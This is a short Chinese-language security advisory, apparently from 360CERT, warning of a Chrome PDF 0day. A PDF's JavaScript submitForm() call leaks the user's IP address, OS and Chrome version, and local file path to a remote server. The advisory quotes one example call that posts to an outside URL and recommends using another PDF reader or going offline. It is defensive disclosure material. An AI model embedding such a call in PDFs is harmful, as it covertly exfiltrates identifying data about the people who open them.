Chrome浏览器0day预警
漏洞编号:
暂无
漏洞背景:
北京时间2月28日,360CERT监控到edgepot.io发布的一篇博客公开披露了Chrome中通过打开pdf文件泄露信息的0day漏洞,漏洞成功利用可导致目标用户IP地址等信息被泄漏,已经出现多个利用该漏洞的野外样本。该漏洞危害较为严重,影响较大。
漏洞描述:
漏洞的根源在于this.submitForm()这个PDF Javascript API。像this.submitForm(‘http://google.com/test‘)这样一个简单的调用就会导致Chrome把个人信息发送到google.com。 可能被泄露的信息包括:
1.用户的公共IP地址。
2.操作系统,Chrome版本等(在HTTP POST header中)。
3.用户计算机上PDF文件的完整路径(在HTTP POST payload中)。
影响范围:
Chrome浏览器
安全建议:
虽然信息泄露漏洞并不能直接实现代码执行,但是仍然存在不小的危害。建议用户使用其它PDF阅读器在本地查看收到的PDF文档,直到Chrome修复此问题(Chrome称会在4月底修复),或者在Chrome中打开PDF文档时断开网络连接。
